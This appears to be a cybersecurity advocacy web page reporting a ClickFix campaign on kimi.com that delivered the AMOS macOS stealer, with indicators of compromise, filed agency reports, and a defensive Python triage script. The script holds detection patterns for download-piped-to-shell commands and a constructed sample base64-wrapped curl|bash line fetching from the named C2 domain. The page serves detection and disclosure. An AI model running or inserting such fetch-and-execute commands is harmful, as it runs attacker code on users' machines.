Active Threat Monitoring

Exposing Cyber Threats.
Protecting Digital Futures.

CogNoodle Advocacy investigates, documents, and exposes real-world cybersecurity threats — from malware campaigns to AI-powered social engineering — so the world can fight back.

AMOS Stealer — Active Campaign
ClickFix Social Engineering — Spreading
kimi.com Compromised Delivery Vector
CogNoodle Investigation #001 Published
contatoplus.com C2 Infrastructure — Brazil
Multinational Attack Chain: CN → BR → RU
Federal Reports Filed (FBI, CISA, FTC)
Three Pillars of Digital Defense

We believe cybersecurity awareness shouldn't be locked behind paywalls or corporate firewalls. CogNoodle Advocacy makes threat intelligence accessible to everyone.

🔍 Investigate & Expose

Real-time investigation of active malware campaigns, social engineering attacks, and threat actor infrastructure. We document everything so the community can learn.

🛡️ Educate & Protect

Translating complex threat intelligence into actionable guidance. From IOC databases to plain-language advisories, we help individuals and organizations defend themselves.

📢 Report & Advocate

Filing reports with federal agencies (FBI, CISA, FTC), coordinating with platform vendors, and advocating for policy changes that make the internet safer for everyone.

Investigation #001: ClickFix on kimi.com

A multinational malware delivery operation leveraging a Chinese AI platform to distribute Russian-origin macOS infostealer malware through Brazilian command-and-control infrastructure.

🔴 Active Threat — Feb 2026

ClickFix + AMOS Stealer:
The kimi.com Attack Chain

On February 26, 2026, CogNoodle researchers encountered a ClickFix social engineering attack on kimi.com (Moonshot AI) that attempted to deliver AMOS (Atomic macOS Stealer) via fake system dialogs triggering curl|bash payloads. The download attempt was unsuccessful based on available evidence.

Read Full Investigation Report →

🌐 Delivery Vector: kimi.com (China)
🖥️ C2 Server: contatoplus.com (Brazil)
💀 Payload: AMOS Stealer (Russia)
🗺️ Infrastructure: Contabo GmbH, AS174
📋 MITRE ATT&CK: T1204, T1059, T1027, T1555
⚠️ Indicators of Compromise (IOCs)

Domain: contatoplus.com — C2 server (Brazilian hosting)
IP: 191.101.236.x — Contabo GmbH VPS (ASN 174)
Domain: kimi.com — Delivery vector (injected ClickFix)
Technique: Base64 → curl|bash — Encoded C2 URL in clipboard payload
Malware: AMOS (Atomic macOS Stealer) — Russian-origin MaaS via Telegram
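As an added defender-side example (not code from CogNoodle or from the investigation report), the script below shows how a blue team could triage shell command lines taken from Terminal history or endpoint telemetry for the ClickFix shape described above: it decodes base64 blobs, looks for a downloader piped straight into a shell, and matches any embedded URL host against the IOC list on this page. The sample commands, the placeholder URL path and the prefix form of the masked IP are constructed for the example and are not captured campaign artifacts.

```python
import base64
import re
from urllib.parse import urlparse

# Watchlist built from the indicators on this page: the C2 domain and the masked
# VPS address (191.101.236.x), expressed here as a prefix (constructed form).
IOC_DOMAINS = {"contatoplus.com"}
IOC_IP_PREFIXES = ("191.101.236.",)

# Shapes typical of a ClickFix lure: a base64 blob handed to a decoder, and a
# downloader whose output is piped straight into an interpreter.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:bash|sh|zsh)\b")
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
URL = re.compile(r"https?://[^\s'\"|;]+")


def decode_base64_blobs(cmd):
    """Decode every base64-looking token in cmd; keep only printable text."""
    layers = []
    for blob in B64_BLOB.findall(cmd):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text once decoded
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            layers.append(text)
    return layers


def is_ioc(host):
    """True if host matches a watchlisted domain (or subdomain) or IP prefix."""
    host = host.lower()
    if host.startswith(IOC_IP_PREFIXES):
        return True
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def analyze_command(cmd):
    """Triage one shell command line as seen in shell history or EDR telemetry."""
    layers = [cmd] + decode_base64_blobs(cmd)  # outer command plus decoded payloads
    urls = [u for layer in layers for u in URL.findall(layer)]
    hosts = {urlparse(u).hostname for u in urls} - {None}
    ioc_hits = sorted(h for h in hosts if is_ioc(h))
    pipes_to_shell = any(PIPE_TO_SHELL.search(layer) for layer in layers)
    downloads = any(DOWNLOADER.search(layer) for layer in layers)

    if ioc_hits:
        verdict = "malicious"    # talks to known C2 infrastructure
    elif downloads and pipes_to_shell:
        verdict = "suspicious"   # curl|bash pattern, no known-bad host
    else:
        verdict = "benign"
    return {
        "verdict": verdict,
        "ioc_hits": ioc_hits,
        "urls": urls,
        "decoded_layers": layers[1:],
        "pipes_to_shell": pipes_to_shell,
    }


# Constructed sample commands (not captured from the real campaign). The third one
# mimics the ClickFix shape: base64 wrapping a curl|bash fetch from the C2 domain;
# the URL path is a placeholder.
INNER_COMMAND = "curl -fsSL 'https://contatoplus.com/PLACEHOLDER-PATH' | bash"
SAMPLE_COMMANDS = [
    "ls -la ~/Downloads",
    "curl -fsSL https://get.example.com/install.sh | bash",
    "echo " + base64.b64encode(INNER_COMMAND.encode()).decode() + " | base64 -d | bash",
]


def triage(commands):
    """Return (command, verdict, ioc_hits) for each command line."""
    results = []
    for cmd in commands:
        r = analyze_command(cmd)
        results.append((cmd, r["verdict"], r["ioc_hits"]))
    return results


if __name__ == "__main__":
    for cmd, verdict, hits in triage(SAMPLE_COMMANDS):
        print(f"{verdict:10s} {hits or '-'}  {cmd[:60]}")
```

The decoded layers are searched with the same patterns as the outer command, so a lure that hides the download behind `echo … | base64 -d | bash` is caught by the host match rather than by the outer text alone; a downloader-to-shell pattern with no watchlisted host is flagged for review instead of blocked outright.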
Active Reports Filed

CogNoodle has filed formal reports with federal cybersecurity and law enforcement agencies regarding the ClickFix/AMOS threat campaign.

πŸ›οΈ FBI Internet Crime Complaint Center

Formal cybercrime complaint filed with the FBI IC3 detailing the multinational attack chain and threat actor infrastructure.

ic3.gov →

πŸ›‘οΈ CISA (Cybersecurity & Infrastructure Security Agency)

Vulnerability disclosure and threat intelligence report submitted to CISA for national cybersecurity awareness coordination.

cisa.gov →

βš–οΈ Federal Trade Commission (FTC)

Consumer protection report filed documenting deceptive tactics used in the ClickFix social engineering campaign.

reportfraud.ftc.gov →

🔒 Google Safe Browsing

Malicious URL and phishing site report submitted to Google's Safe Browsing team for browser-level threat protection.

safebrowsing.google.com →

Spotted a threat? Report it.

If you've encountered suspicious activity, malware, or social engineering attacks, contact us. We investigate, document, and file reports with the appropriate authorities.

Contact CogNoodle Security